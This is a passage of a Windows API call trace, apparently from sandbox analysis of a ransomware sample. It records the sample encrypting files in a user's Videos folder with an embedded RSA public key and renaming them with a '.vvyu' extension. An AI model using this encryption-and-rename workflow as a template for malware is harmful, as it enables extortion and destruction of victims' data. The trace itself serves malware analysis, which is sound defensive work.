out: hHeap=0x2c0000) returned 1 [0195.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0195.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0195.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0195.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea068 | out: hHeap=0x2c0000) returned 1 [0195.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.990] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x8f38, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x8f38, lpOverlapped=0x0) returned 1 [0195.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.991] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x8f3d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.991] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0195.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0195.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.993] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0195.993] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.994] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.994] CloseHandle (hObject=0x584) returned 1 [0195.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0195.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.999] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\L59EH_1g_s_fJjq.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\l59eh_1g_s_fjjq.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\L59EH_1g_s_fJjq.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\l59eh_1g_s_fjjq.mp4.vvyu")) returned 1 [0196.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.001] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0196.004] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb757b40, ftCreationTime.dwHighDateTime=0x1d8a515, ftLastAccessTime.dwLowDateTime=0x58c4ab70, ftLastAccessTime.dwHighDateTime=0x1d8a56a, ftLastWriteTime.dwLowDateTime=0x58c4ab70, ftLastWriteTime.dwHighDateTime=0x1d8a56a, nFileSizeHigh=0x0, nFileSizeLow=0x961a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NMttoz1zVMuEbci.swf", cAlternateFileName="NMTTOZ~1.SWF")) returned 1 [0196.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0196.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0196.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0196.004] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\NMttoz1zVMuEbci.swf") returned=".swf" [0196.004] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\NMttoz1zVMuEbci.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\nmttoz1zvmuebci.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.007] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=38426) returned 1 [0196.007] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.011] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x95f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.011] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.013] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.013] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x961a, lpOverlapped=0x0) returned 1 [0196.014] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.014] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.014] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.014] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0196.015] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.015] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.015] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.015] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.015] GetLastError () returned 0x0 [0196.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.015] GetLastError () returned 0x0 [0196.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.016] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.016] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0196.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.017] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.017] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.017] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9620) returned 0x2af5168 [0196.017] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea068 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6500 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea0b0 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6518 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6548 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65a8 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6560 [0196.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.019] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0196.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0196.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0196.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65a8 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6560 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6548 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0196.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0196.022] GetCurrentThreadId () returned 0x5d8 [0196.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8928 [0196.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0196.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.022] GetCurrentThreadId () returned 0x5d8 [0196.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65a8 [0196.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6548 [0196.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6560 [0196.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6530 [0196.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65c0 [0196.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0196.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6590 [0196.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6578 [0196.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65d8 [0196.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6578 [0196.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.026] HeapFree (in: 